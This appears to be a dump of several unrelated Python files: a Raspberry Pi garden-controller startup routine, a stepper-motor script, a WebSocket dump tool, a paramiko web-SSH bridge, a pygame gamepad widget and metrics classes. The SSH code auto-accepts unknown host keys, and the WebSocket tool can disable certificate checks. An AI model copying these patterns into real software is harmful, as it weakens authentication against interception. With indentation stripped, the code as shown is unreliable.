GPIO.setmode(GPIO.BCM)
GPIO.cleanup()
# Pause for GPIO to finish
time.sleep(0.1)
Logger.log(LOG_LEVEL["info"], 'Initializing Garden Control...\t\t\033[1;32m Complete\033[0;0m')
print('Preparing Threads for Workers\r', end="", flush=True)
new_messages_waiting = threading.Event() # Event to signal LCD to pull new messages
main_thread_running = threading.Event() # Event to signal workers to close
system_ready = threading.Event() # Event to tell workers to begin working
camera_available = threading.Event() # Event to signal if camera can be used
lcd_available = threading.Event() # Event to signal if lcd displays can be used
main_thread_running.set() # Main event to tell workers to run/shutdown
time.sleep(0.1)
Logger.log(LOG_LEVEL["info"], 'Preparing Threads for Workers...\t\033[1;32m Complete\033[0;0m')
# Worker for Camera
try:
if len(CONFIGS["camera"]) > 0:
CONFIGS["camera"]["redis"] = r
c = CameraWorker(CONFIGS['camera'], main_thread_running, system_ready, camera_available)
Logger.log(LOG_LEVEL["info"], 'Camera...\t\t\t\033[1;32m Initializing\033[0;0m')
workers.append(c)
camera_available.set()
except KeyError:
Logger.log(LOG_LEVEL["info"], 'Pi Camera...\t\t\t\t\033[1;31m Disabled\033[0;0m')
# Workers for pi (Sensors, Controls, Relays, I2C)
try:
if len(CONFIGS["workers"]) > 0:
for worker in CONFIGS['workers']:
# Create a worker instance matching its configured type
worker["redis"] = r
if worker['type'] == "sensor":
pw = PiSensorWorker(worker, main_thread_running, system_ready)
Logger.log(LOG_LEVEL["info"], 'Sensors...\t\t\t\t\033[1;32m Initializing\033[0;0m')
elif worker['type'] == "control":
pw = PiControlWorker(worker, main_thread_running, system_ready)
Logger.log(LOG_LEVEL["info"], 'Controls...\t\t\t\t\033[1;32m Initializing\033[0;0m')
elif worker['type'] == "i2c":
pw = PiI2CWorker(worker, main_thread_running, system_ready)
Logger.log(LOG_LEVEL["info"], 'I2C Comms...\t\t\t\t\033[1;32m Initializing\033[0;0m')
elif worker['type'] == "display":
for display in worker['displays']:
display["redis"] = r
pw = LcdWorker(display, main_thread_running, system_ready, lcd_available)
lcd_available.set()
Logger.log(LOG_LEVEL["info"], 'LCD Displays...\t\t\t\t\033[1;32m Initializing\033[0;0m')
elif worker['type'] == "relay":
# Add Relay Worker Here for Better Config Control
Logger.log(LOG_LEVEL["info"], 'Relay...\t\t\t\033[1;32m Initializing\033[0;0m')
else:
Logger.log(LOG_LEVEL["warning"], "Exception raised due to unknown Worker Type: {0}".format(worker['type']))
raise Exception("Unknown Worker Type: " + worker['type'])
workers.append(pw)
except KeyError as e:
Logger.log(LOG_LEVEL["info"], 'Pi Workers...\t\t\t\t\033[1;31m Disabled\033[0;0m')
print(e)
# Worker for relays attached to pi
try:
if len(CONFIGS["relays"]) > 0:
for relay in CONFIGS['relays']:
relay["redis"] = r
relayState = {
"available": threading.Event(), # Event to allow relay to activate
"active": threading.Event() # Event to signal relay to open/close
}
relayEvents[relay.get("key", relay_index)] = relayState
rw = RelayWorker(relay, main_thread_running, system_ready, relayState['available'], relayState['active'])
workers.append(rw)
# Make the relays available, this event is toggled off elsewhere if we need to disable relays
relayState['available'].set()
relay_index += 1
except KeyError:
Logger.log(LOG_LEVEL["info"], 'Relays Workers...\t\t\033[1;31m Disabled\033[0;0m')
# Load in Actions
try:
if len(CONFIGS["actions"]) > 0:
for action in CONFIGS["actions"]:
action["redis"] = r
a = Action(action)
a.init_action()
actions[a.key] = a
Logger.log(LOG_LEVEL["info"], '{0} Actions...\t\t\t\t\033[1;32m Initializing\033[0;0m'.format(len(CONFIGS['actions'])))
except KeyError:
Logger.log(LOG_LEVEL["info"], 'Actions...\t\t\t\033[1;31m Disabled\033[0;0m')
# Worker for Sequences
try:
if len(CONFIGS["sequences"]) > 0:
for sequence in CONFIGS["sequences"]:
sequence["redis"] = r
sequenceState = {
"available": threading.Event(), # Event to allow sequence to activate
"active": threading.Event() # Event to signal sequence to open/close
}
sequenceEvents[sequence.get("key", sequence_index)] = sequenceState
s = SequenceWorker(sequence, main_thread_running, system_ready, sequenceState['available'], sequenceState['active'], actions)
workers.append(s)
sequences[s.key] = s
sequenceState['available'].set()
sequence_index += 1
Logger.log(LOG_LEVEL["info"], '{0} Sequences...\t\t\t\t\033[1;32m Initializing\033[0;0m'.format(len(CONFIGS["sequences"])))
except KeyError:
Logger.log(LOG_LEVEL["info"], 'Sequences...\t\t\t\t\033[1;31m Disabled\033[0;0m')
# Worker for Triggers
try:
if len(CONFIGS["triggers"]) > 0:
for trigger in CONFIGS["triggers"]:
trigger["redis"] = r
t = TriggerWorker(trigger, main_thread_running, system_ready, actions, sequences)
Logger.log(LOG_LEVEL["info"], 'Triggers...\t\t\t\t\033[1;32m Initializing\033[0;0m')
workers.append(t)
except KeyError:
Logger.log(LOG_LEVEL["info"], 'Triggers...\t\t\t\t\033[1;31m Disabled\033[0;0m')
# Worker for nodes attached to pi via serial or wifi[esp8266, esp32]
# Supported nodes: arduinos, esp8266, ADC-MCP3xxx, probably others (esp32 with custom nanpy fork)
try:
if len(CONFIGS["nodes"]) > 0:
for node in CONFIGS['nodes']:
node["redis"] = r
if node['type'] == "arduino":
if NANPY_ENABLED:
Logger.log(LOG_LEVEL["info"], 'MudPi Arduino Workers...\t\t\033[1;32m Initializing\033[0;0m')
t = ArduinoWorker(node, main_thread_running, system_ready)
else:
Logger.log(LOG_LEVEL["error"], 'Error Loading Nanpy library. Did you pip3 install -r requirements.txt?')
elif node['type'] == "ADC-MCP3008":
if MCP_ENABLED:
Logger.log(LOG_LEVEL["info"], 'MudPi ADC Workers...\t\t\033[1;32m Initializing\033[0;0m')
t = ADCMCP3008Worker(node, main_thread_running, system_ready)
else:
Logger.log(LOG_LEVEL["error"], 'Error Loading MCP3xxx library. Did you pip3 install -r requirements.txt;?')
else:
Logger.log(LOG_LEVEL["warning"], "Exception raised due to unknown Node Type: {0}".format(node['type']))
raise Exception("Unknown Node Type: " + node['type'])
nodes.append(t)
except KeyError as e:
Logger.log(LOG_LEVEL["info"], 'MudPi Node Workers...\t\t\t\033[1;31m Disabled\033[0;0m')
# try:
# if (CONFIGS['server'] is not None):
# Logger.log(LOG_LEVEL["info"], 'MudPi Server...\t\t\t\t\033[1;33m Starting\033[0;0m', end='\r', flush=True)
# time.sleep(1)
# server = MudpiServer(main_thread_running, CONFIGS['server']['host'], CONFIGS['server']['port'])
# s = threading.Thread(target=server_worker) # TODO where is server_worker supposed to be initialized?
# threads.append(s)
# s.start()
# except KeyError:
# Logger.log(LOG_LEVEL["info"], 'MudPi Socket Server...\t\t\t\033[1;31m Disabled\033[0;0m')
Logger.log(LOG_LEVEL["info"], 'MudPi Garden Controls...\t\t\033[1;32m Initialized\033[0;0m')
Logger.log(LOG_LEVEL["info"], 'Engaging MudPi Workers...\t\t\033[1;32m \033[0;0m')
for worker in workers:
t = worker.run()
threads.append(t)
time.sleep(.5)
for node in nodes:
t = node.run()
threads.append(t)
time.sleep(.5)
time.sleep(.5)
Logger.log(LOG_LEVEL["info"], 'MudPi Garden Control...\t\t\t\033[1;32m Online\033[0;0m')
Logger.log(LOG_LEVEL["info"], '_________________________________________________')
system_ready.set() # Workers will not process until system is ready
r.set('started_at', str(datetime.datetime.now())) # Store current time to track uptime
system_message = {'event':'SystemStarted', 'data':1}
r.publish('mudpi', json.dumps(system_message))
# Hold the program here until it's time for a graceful shutdown
while PROGRAM_RUNNING:
# Main program loop
# add logging or other system operations here...
time.sleep(0.1)
except KeyboardInterrupt:
PROGRAM_RUNNING = False
finally:
Logger.log(LOG_LEVEL["info"], 'MudPi Shutting Down...')
# Perform any cleanup tasks here...
try:
server.sock.shutdown(socket.SHUT_RDWR)
except Exception:
# The socket server may never have been started
pass
# Clear main running event to signal threads to close
main_thread_running.clear()
# Shutdown the camera loop
camera_available.clear()
# Join all our threads for shutdown
for thread in threads:
thread.join()
Logger.log(LOG_LEVEL["info"], "MudPi Shutting Down...\t\t\t\033[1;32m Complete\033[0;0m")
Logger.log(LOG_LEVEL["info"], "Mudpi is Now...\t\t\t\t\033[1;31m Offline\033[0;0m")
|
motor_step.py | import RPi.GPIO as GPIO
from RpiMotorLib import RpiMotorLib
import multiprocessing as mp
# Define GPIO pins
GPIO_pins = (17, 27, 22)
direction = 20
step = 21
motor = RpiMotorLib.A4988Nema(direction, step, GPIO_pins, "A4988")
#class Motor_step():
def motor_step_run():
#print ("Motor Running")
# clockwise=False, full steps, 1500 steps, 0.006 s step delay, verbose=False, 0.05 s init delay
motor.motor_go(False, "Full", 1500, .006, False, .05)
#motor.motor_stop()
def motor_step_stop(process):
# The original body referenced an undefined `self`; terminating the worker
# process is the simplest way to stop a run started via multiprocessing.
process.terminate()
if __name__ == '__main__':
p1 = mp.Process(target=motor_step_run)
p1.start()
print('Job already dispatched')
name = input("Enter name: ")
print(name) |
wsdump.py | #!/home/guilherme/Programming/Python/Reddit_Bot/bin/python3
import argparse
import code
import sys
import threading
import time
import ssl
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
encoding = getattr(sys.stdin, "encoding", "")
if not encoding:
return "utf-8"
else:
return encoding.lower()
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v") + 1
setattr(args, self.dest, values)
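# e.g. `-v` -> verbose=1, `-vv` -> verbose=2, `-v 3` -> verbose=3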
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-p", "--proxy",
help="proxy url. ex. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
parser.add_argument("-r", "--raw", action="store_true",
help="raw output")
parser.add_argument("-s", "--subprotocols", nargs='*',
help="Set subprotocols")
parser.add_argument("-o", "--origin",
help="Set origin")
parser.add_argument("--eof-wait", default=0, type=int,
help="wait time(second) after 'EOF' received.")
parser.add_argument("-t", "--text",
help="Send initial text")
parser.add_argument("--timings", action="store_true",
help="Print timings in seconds")
parser.add_argument("--headers",
help="Set custom headers. Use ',' as separator")
return parser.parse_args()
class RawInput:
def raw_input(self, prompt):
if six.PY3:
line = input(prompt)
else:
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, six.text_type):
line = line.encode("utf-8")
return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m< " + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def read(self):
return self.raw_input("> ")
class NonInteractive(RawInput):
def write(self, data):
sys.stdout.write(data)
sys.stdout.write("\n")
sys.stdout.flush()
def read(self):
return self.raw_input("")
def main():
start_time = time.time()
args = parse_args()
if args.verbose > 1:
websocket.enableTrace(True)
options = {}
if args.proxy:
p = urlparse(args.proxy)
options["http_proxy_host"] = p.hostname
options["http_proxy_port"] = p.port
if args.origin:
options["origin"] = args.origin
if args.subprotocols:
options["subprotocols"] = args.subprotocols
opts = {}
if args.nocert:
opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
if args.headers:
options['header'] = list(map(str.strip, args.headers.split(',')))
ws = websocket.create_connection(args.url, sslopt=opts, **options)
if args.raw:
console = NonInteractive()
else:
console = InteractiveConsole()
print("Press Ctrl+C to quit")
def recv():
try:
frame = ws.recv_frame()
except websocket.WebSocketException:
return websocket.ABNF.OPCODE_CLOSE, None
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return frame.opcode, frame.data
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return frame.opcode, None
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong(frame.data)
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
data = str(data, "utf-8")
if not args.verbose and opcode in OPCODE_DATA:
msg = data
elif args.verbose:
msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
if msg is not None:
if args.timings:
console.write(str(time.time() - start_time) + ": " + msg)
else:
console.write(msg)
if opcode == websocket.ABNF.OPCODE_CLOSE:
break
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
if args.text:
ws.send(args.text)
while True:
try:
message = console.read()
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
time.sleep(args.eof_wait)
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
ssh.py | import paramiko
import threading
from threading import Thread
from django_webssh.tools.tools import get_key_obj
import traceback
import socket
import json
zmodemszstart = b'rz\r**\x18B00000000000000\r\x8a'
zmodemszend = b'**\x18B0800000000022d\r\x8a'
zmodemrzstart = b'rz waiting to receive.**\x18B0100000023be50\r\x8a'
zmodemrzend = b'**\x18B0800000000022d\r\x8a'
zmodemcancel = b'\x18\x18\x18\x18\x18\x08\x08\x08\x08\x08'
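# The byte strings above are ZMODEM start/end/cancel markers emitted by rz/sz;
# websocket_to_django() scans for them so file-transfer payloads are forwarded
# as raw bytes instead of being UTF-8 decoded.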
class SSH:
def __init__(self, websocker, message):
self.websocker = websocker
self.message = message
self.cmd = ''
self.res = ''
self.zmodem = False
self.zmodemOO = False
# term may be ansi, linux, vt100, xterm or dumb; all except dumb support color output
def connect(self, host, user, password=None, ssh_key=None, port=22, timeout=30,
term='ansi', pty_width=80, pty_height=24):
try:
ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if ssh_key:
key = get_key_obj(paramiko.RSAKey, pkey_obj=ssh_key, password=password) or \
get_key_obj(paramiko.DSSKey, pkey_obj=ssh_key, password=password) or \
get_key_obj(paramiko.ECDSAKey, pkey_obj=ssh_key, password=password) or \
get_key_obj(paramiko.Ed25519Key, pkey_obj=ssh_key, password=password)
ssh_client.connect(username=user, hostname=host, port=port, pkey=key, timeout=timeout)
else:
ssh_client.connect(username=user, password=password, hostname=host, port=port, timeout=timeout)
transport = ssh_client.get_transport()
self.channel = transport.open_session()
self.channel.get_pty(term=term, width=pty_width, height=pty_height)
self.channel.invoke_shell()
for i in range(2):
recv = self.channel.recv(1024).decode('utf-8')
self.message['status'] = 0
self.message['message'] = recv
message = json.dumps(self.message)
self.websocker.send(message)
self.res += recv
# Originally three threads forwarded server output to the Django websocket; one is sufficient
Thread(target=self.websocket_to_django).start()
# Thread(target=self.websocket_to_django).start()
# Thread(target=self.websocket_to_django).start()
except Exception:
self.message['status'] = 2
self.message['message'] = 'connection failed...'
message = json.dumps(self.message)
self.websocker.send(message)
self.websocker.close(3001)
def resize_pty(self, cols, rows):
self.channel.resize_pty(width=cols, height=rows)
def django_to_ssh(self, data):
try:
self.channel.send(data)
if data == '\r':
data = '\n'
self.cmd += data
except Exception:
self.close()
def django_bytes_to_ssh(self, data):
try:
self.channel.send(data)
except Exception:
self.close()
def websocket_to_django(self):
try:
while True:
if self.zmodemOO:
self.zmodemOO = False
data = self.channel.recv(2)
if not len(data):
return
if data == b'OO':
self.websocker.send(bytes_data=data)
continue
else:
data = data + self.channel.recv(4096)
else:
data = self.channel.recv(4096)
if not len(data):
return
if self.zmodem:
if zmodemszend in data or zmodemrzend in data:
self.zmodem = False
if zmodemszend in data:
self.zmodemOO = True
if zmodemcancel in data:
self.zmodem = False
self.websocker.send(bytes_data=data)
else:
if zmodemszstart in data or zmodemrzstart in data:
self.zmodem = True
self.websocker.send(bytes_data=data)
else:
data = data.decode('utf-8')
self.message['status'] = 0
self.message['message'] = data
self.res += data
message = json.dumps(self.message)
self.websocker.send(message)
except Exception:
self.close()
def close(self):
self.message['status'] = 1
self.message['message'] = 'connection closed...'
message = json.dumps(self.message)
self.websocker.send(message)
self.websocker.close()
self.channel.close()
def shell(self, data):
# The original author spawned a thread for every send to ssh; each send is a single
# character, so calling the function directly performs better than creating a thread.
# Thread(target=self.django_to_ssh, args=(data,)).start()
self.django_to_ssh(data)
# If the thread that forwards data to the Django websocket were created here, every
# character typed on the client would spawn a new thread, eventually creating far too
# many threads; it is therefore created once in connect() instead.
# Thread(target=self.websocket_to_django).start()
|
local_controller.py | import os
os.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = "hide"
import pygame
import ipywidgets
from ipywidgets.widgets.trait_types import TypedTuple
from traitlets import Bool, Int, Float, Unicode, Instance, List
from ipywidgets.widgets.widget_controller import Axis, Button
import traitlets
import time
import threading
def _clamp(x):
if x < -1.0:
return -1.0
elif x > 1.0:
return 1.0
else:
return x
class LocalController(ipywidgets.VBox):
index = Int(help="The id number of the controller.").tag(sync=True)
name = Unicode(read_only=True, help="The name of the controller.").tag(sync=True)
connected = Bool(read_only=True, help="Whether the gamepad is connected.").tag(sync=True)
timestamp = Float(read_only=True, help="The last time the data from this gamepad was updated.").tag(sync=True)
buttons = List(Instance(Button), read_only=True)
axes = List(Instance(Axis), read_only=True)
def __init__(self, index=0):
pygame.init()
if pygame.joystick.get_count() < 1:
raise RuntimeError("No joystick devices found.")
try:
self._joystick = pygame.joystick.Joystick(index)
except pygame.error:
raise RuntimeError("Could not connect to joystick with index {index}".format(index=index))
name = self._joystick.get_name()
index = self._joystick.get_id()
num_buttons = self._joystick.get_numbuttons()
num_axes = self._joystick.get_numaxes()
buttons = [Button() for i in range(num_buttons)]
axes = [Axis() for i in range(num_axes)]
self.set_trait('axes', axes)
self.set_trait('buttons', buttons)
self.set_trait('name', name)
self.set_trait('index', index)
self.set_trait('connected', True)
axesBox = ipywidgets.HBox(axes)
buttonsBox = ipywidgets.HBox(buttons)
nameLabel = ipywidgets.Label(value=name)
self._init_joystick_values()
self._thread = None
self._running = False
self._start()
super().__init__(children=(axesBox, buttonsBox, nameLabel))
def _init_joystick_values(self):
for i in range(self._joystick.get_numaxes()):
self.axes[i].set_trait('value', _clamp(self._joystick.get_axis(i)))
for j in range(self._joystick.get_numbuttons()):
self.buttons[j].set_trait('value', self._joystick.get_button(j))
self.buttons[j].set_trait('pressed', self._joystick.get_button(j))
def run(self):
while self._running:
events = pygame.event.get()
timestamp = time.monotonic_ns()
for event in events:
if event.type == pygame.JOYAXISMOTION and event.joy == self.index:
axis = event.axis
self.set_trait('timestamp', timestamp)
self.axes[axis].set_trait('value', _clamp(event.value))
elif event.type == pygame.JOYBUTTONDOWN and event.joy == self.index:
button = event.button
self.set_trait('timestamp', timestamp)
self.buttons[button].set_trait('value', 1.0)
self.buttons[button].set_trait('pressed', True)
elif event.type == pygame.JOYBUTTONUP and event.joy == self.index:
button = event.button
self.set_trait('timestamp', timestamp)
self.buttons[button].set_trait('value', 0.0)
self.buttons[button].set_trait('pressed', False)
time.sleep(0.01)
def _start(self):
if self._thread is None:
self._thread = threading.Thread(target=self.run)
self._running = True
self._thread.start()
def _stop(self):
if self._thread is not None:
self._running = False
self._thread.join()
self._thread = None
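# Usage sketch (illustrative; assumes a Jupyter notebook and an attached gamepad):
#
#     from IPython.display import display
#     controller = LocalController(index=0)  # polls pygame events on a background thread
#     display(controller)                    # renders axes/buttons as ipywidgets
#     controller._stop()                     # stop the polling thread when done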
|
metrics.py | # Copyright Contributors to the Testing Farm project.
# SPDX-License-Identifier: Apache-2.0
"""
Classes and functions dealing with metrics.
Our metrics are stored in the database. To transport them through our code, we use dataclasses based on
:py:class:`MetricsBase` class. These are then responsible for loading their data from the database and
conversion to Prometheus-compatible objects, and for providing easy-to-use methods to update metrics
in their area.
Our metrics are split into several sections, grouped together by the subsystem or other shared properties,
and together they form a tree of :py:class:`MetricsBase` classes, starting with :py:class:`Metrics` which
then links to :py:class:`DBMetrics` and other areas. :py:class:`MetricsBase` itself is *not* a dataclass
since it provides only methods, and therefore does not need to be declared as a container - that's left
to its descendants.
"""
import dataclasses
import datetime
import enum
import json
import os
import platform
import threading
import time
from typing import Any, Callable, Dict, List, Optional, Tuple, Type, TypeVar, Union, cast
import gluetool.log
import prometheus_client.utils
import redis
import sqlalchemy
import sqlalchemy.orm.session
import sqlalchemy.sql.schema
from gluetool.result import Ok, Result
from prometheus_client import CollectorRegistry, Counter, Gauge, Histogram, Info, generate_latest
from . import __VERSION__, DATETIME_FMT, Failure, SerializableContainer
from . import db as artemis_db
from . import safe_call
from .cache import dec_cache_field, dec_cache_value, get_cache_value, inc_cache_field, inc_cache_value, \
iter_cache_fields, iter_cache_keys, set_cache_value
from .context import DATABASE, SESSION, with_context
from .guest import GuestState
from .knobs import KNOB_POOL_ENABLED, KNOB_WORKER_PROCESS_METRICS_TTL
T = TypeVar('T')
# Guest age buckets are not all the same size:
#
# * the first hour is split into 5-minute intervals,
# * the next 47 hours by hour,
# * and everything else falls into the final bucket.
GUEST_AGE_BUCKETS = \
list(range(300, 3600, 300)) \
+ list(range(3600, 49 * 3600, 3600)) \
+ [prometheus_client.utils.INF]
# Message processing time buckets, in milliseconds, spanning from 5 milliseconds up to 900 seconds.
# Taken from the Prometheus middleware Dramatiq provides - not tailored to our needs, but the bucket
# setup is compatible with our architecture.
MESSAGE_DURATION_BUCKETS = (
# -> 1s
5, 10, 25, 50, 75, 100, 250, 500, 750, 1000,
# -> 10s
2500, 5000, 7500, 10000,
# -> 60s
30000, 60000,
# -> 600s/10m
120000, 180000, 240000, 300000, 360000, 420000, 480000, 540000, 600000,
# -> 900s/15m
900000,
prometheus_client.utils.INF
)
# Machine provisioning time buckets, in seconds, spanning from 60 seconds up to 24 hours.
# The first hour is split by minute, the next 23 hours by hour.
PROVISION_DURATION_BUCKETS = \
list(range(60, 3600, 60)) \
+ list(range(3600, 23 * 3600 + 3600, 3600)) \
+ [prometheus_client.utils.INF]
# HTTP request processing time buckets, in milliseconds. Spanning from 5 milliseconds up to 15 seconds.
HTTP_REQUEST_DURATION_BUCKETS = (
# -> 1s
5, 10, 25, 50, 75, 100, 250, 500, 750, 1000,
# -> 15s
2500, 5000, 7500, 10000, 15000,
prometheus_client.utils.INF
)
# CLI call duration buckets, in seconds. Spanning from 1 second up to 10 minutes.
CLI_CALL_DURATION_BUCKETS = (
# -> 60 seconds
1, 2, 5, 10, 20, 30, 40, 50, 60,
# -> 600 seconds
120, 180, 240, 300, 360, 420, 480, 540, 600,
prometheus_client.utils.INF
)
@dataclasses.dataclass
class WorkerTrafficTask(SerializableContainer):
"""
One "task" as recorded for the purpose of exposing current workload of various workers.
"""
workername: str
worker_pid: int
worker_tid: int
ctime: datetime.datetime
queue: str
actor: str
args: Dict[str, Union[str, None]]
def serialize_to_json(self) -> Dict[str, Any]:
"""
Serialize container to JSON.
:returns: serialized form of container items.
"""
serialized = super().serialize_to_json()
serialized['ctime'] = serialized['ctime'].strftime(DATETIME_FMT)
return serialized
@classmethod
def unserialize_from_json(cls, serialized: Dict[str, Any]) -> 'WorkerTrafficTask':
"""
Unserialize container from JSON.
:param serialized: serialized form of container.
:returns: unserialized container.
"""
serialized['ctime'] = datetime.datetime.strptime(serialized['ctime'], DATETIME_FMT)
return cls(**serialized)
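# Round-trip sketch (illustrative): `ctime` is converted to and from a DATETIME_FMT
# string, so a task can be transported as a plain JSON-able dict:
#
#     task = WorkerTrafficTask(workername='w1', worker_pid=1, worker_tid=1,
#                              ctime=datetime.datetime.utcnow(), queue='default',
#                              actor='noop', args={})
#     blob = task.serialize_to_json()                       # ctime -> string
#     restored = WorkerTrafficTask.unserialize_from_json(blob)  # string -> datetime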
def reset_counters(metric: Union[Counter, Gauge]) -> None:
"""
Reset each existing labeled metric to zero. After that, we can use ``inc()`` again.
:param metric: metric whose labeled sub-metrics we need to reset.
"""
for labeled_metric in metric._metrics.values():
labeled_metric._value.set(0)
def reset_histogram(metric: Histogram) -> None:
"""
Reset each bucket and the total sum to zero. After that, the metric is ready to be filled with updated data.
:param metric: histogram to reset.
"""
if hasattr(metric, '_metrics'):
for labeled_metric in metric._metrics.values():
labeled_metric._sum.set(0)
for i, _ in enumerate(metric._upper_bounds):
labeled_metric._buckets[i].set(0)
else:
metric._sum.set(0)
for i, _ in enumerate(metric._upper_bounds):
metric._buckets[i].set(0)
class MetricsBase:
"""
Base class for all containers carrying metrics around.
"""
_metric_container_fields: List['MetricsBase']
def __post_init__(self) -> None:
"""
Collect all fields that are child classes of this base class.
This list is then used to automagically call :py:func:`sync` and other methods for these fields.
.. note::
This method is called by dataclasses implementation,
see https://docs.python.org/3.7/library/dataclasses.html#post-init-processing
"""
self._metric_container_fields = [
self.__dict__[field.name]
for field in dataclasses.fields(self)
if isinstance(self.__dict__[field.name], MetricsBase)
]
def sync(self) -> None:
"""
Load values from the storage and update this container with up-to-date values.
.. note::
**Requires** the context variables defined in :py:mod:`tft.artemis` to be set properly.
The default implementation delegates the call to all child fields that are descendants of ``MetricsBase``
class.
"""
for container in self._metric_container_fields:
container.sync()
def register_with_prometheus(self, registry: CollectorRegistry) -> None:
"""
Register instances of Prometheus metrics with the given registry.
The default implementation delegates the call to all child fields that are descendants of ``MetricsBase``
class.
:param registry: Prometheus registry to attach metrics to.
"""
for container in self._metric_container_fields:
container.register_with_prometheus(registry)
def update_prometheus(self) -> None:
"""
Update values of Prometheus metric instances with the data in this container.
The default implementation delegates the call to all child fields that are descendants of ``MetricsBase``
class.
"""
for container in self._metric_container_fields:
container.update_prometheus()
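# Sketch of a new metrics container (illustrative, hypothetical class): subclasses
# are dataclasses, and nested containers are collected by __post_init__ so sync(),
# register_with_prometheus() and update_prometheus() are delegated automatically:
#
#     @dataclasses.dataclass
#     class ExampleMetrics(MetricsBase):
#         pool: DBPoolMetrics = dataclasses.field(default_factory=DBPoolMetrics)
#
#     ExampleMetrics().sync()  # delegates to pool.sync()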
@dataclasses.dataclass
class DBPoolMetrics(MetricsBase):
"""
Database connection pool metrics.
"""
#: Total number of connections allowed to exist in the pool.
size: int = 0
#: Number of idle connections checked in to the pool.
checked_in_connections: int = 0
#: Number of connections currently checked out and in use.
checked_out_connections: int = 0
#: Current "overflow" of the pool, i.e. how many connections currently exist above :py:attr:`size`.
current_overflow: int = 0
def sync(self) -> None:
"""
Load values from the storage and update this container with up-to-date values.
"""
super(DBPoolMetrics, self).sync()
db = DATABASE.get()
if not hasattr(db.engine.pool, 'size') or not callable(db.engine.pool.size):
self.size = 0
self.checked_in_connections = 0
self.checked_out_connections = 0
self.current_overflow = 0
return
self.size = db.engine.pool.size()
self.checked_in_connections = db.engine.pool.checkedin()
self.checked_out_connections = db.engine.pool.checkedout()
self.current_overflow = db.engine.pool.overflow()
def register_with_prometheus(self, registry: CollectorRegistry) -> None:
"""
Register instances of Prometheus metrics with the given registry.
:param registry: Prometheus registry to attach metrics to.
"""
super(DBPoolMetrics, self).register_with_prometheus(registry)
self.POOL_SIZE = Gauge(
'db_pool_size',
'Maximal number of connections available in the pool',
registry=registry
)
self.POOL_CHECKED_IN = Gauge(
'db_pool_checked_in',
'Current number of connections checked in',
registry=registry
)
self.POOL_CHECKED_OUT = Gauge(
'db_pool_checked_out',
'Current number of connections out',
registry=registry
)
self.POOL_OVERFLOW = Gauge(
'db_pool_overflow',
'Current overflow of connections',
registry=registry
)
def update_prometheus(self) -> None:
"""
Update values of Prometheus metric instances with the data in this container.
"""
super(DBPoolMetrics, self).update_prometheus()
self.POOL_SIZE.set(self.size)
self.POOL_CHECKED_IN.set(self.checked_in_connections)
self.POOL_CHECKED_OUT.set(self.checked_out_connections)
self.POOL_OVERFLOW.set(self.current_overflow)
@dataclasses.dataclass
class DBMetrics(MetricsBase):
"""
Database metrics.
"""
#: Database connection pool metrics.
pool: DBPoolMetrics = dataclasses.field(default_factory=DBPoolMetrics)
class PoolResourcesMetricsDimensions(enum.Enum):
"""
Which of the pool resource metrics to track, limits or usage.
"""
LIMITS = 'LIMITS'
USAGE = 'USAGE'
@dataclasses.dataclass
class PoolNetworkResources:
"""
Describes current values of a single (virtual) network available to the pool.
"""
# The idea is to store IPv4 and IPv6 as different networks. Might not work, though, in that case we can rename
# this field, e.g. `ipv4_addresses`, and add IPv6 variant. Let's see how it aligns with the real world out there.
addresses: Optional[int] = None
"""
Number of IP addresses.
"""
@dataclasses.dataclass
class PoolResources(MetricsBase):
"""
Describes current values of pool resources.
The class is intentionally left "dimension-less", tied to neither the limits nor the usage side of the
equation, as the actual resource types do not depend on this information.
All fields are optional; leaving a field unset signals that the pool driver is unable or not interested
in tracking it.
This is the main class we use for transporting resource metrics between interested parties.
.. note::
Memory and diskspace are tracked as integers, not using :py:class:`pint.Quantity`. This will be resolved
to stick with Pint wherever we use a value with units.
"""
_KEY = 'metrics.pool.{poolname}.resources.{dimension}'
_KEY_UPDATED_TIMESTAMP = 'metrics.pool.{poolname}.resources.{dimension}.updated_timestamp'
_TRIVIAL_FIELDS = ('instances', 'cores', 'memory', 'diskspace', 'snapshots')
_COMPOUND_FIELDS = ('networks',)
instances: Optional[int]
"""
Number of instances (or machines, VMs, servers, etc. - depending on pool's
terminology).
"""
cores: Optional[int]
"""
Number of CPU cores. Given the virtual nature of many pools, cores are more
common commodity than CPUs.
"""
memory: Optional[int]
"""
Size of RAM, in bytes.
"""
diskspace: Optional[int]
"""
Size of disk space, in bytes.
"""
snapshots: Optional[int]
"""
Number of instance snapshots.
"""
networks: Dict[str, PoolNetworkResources] = dataclasses.field(default_factory=dict)
"""
Network resources, i.e. number of addresses and other network-related metrics.
"""
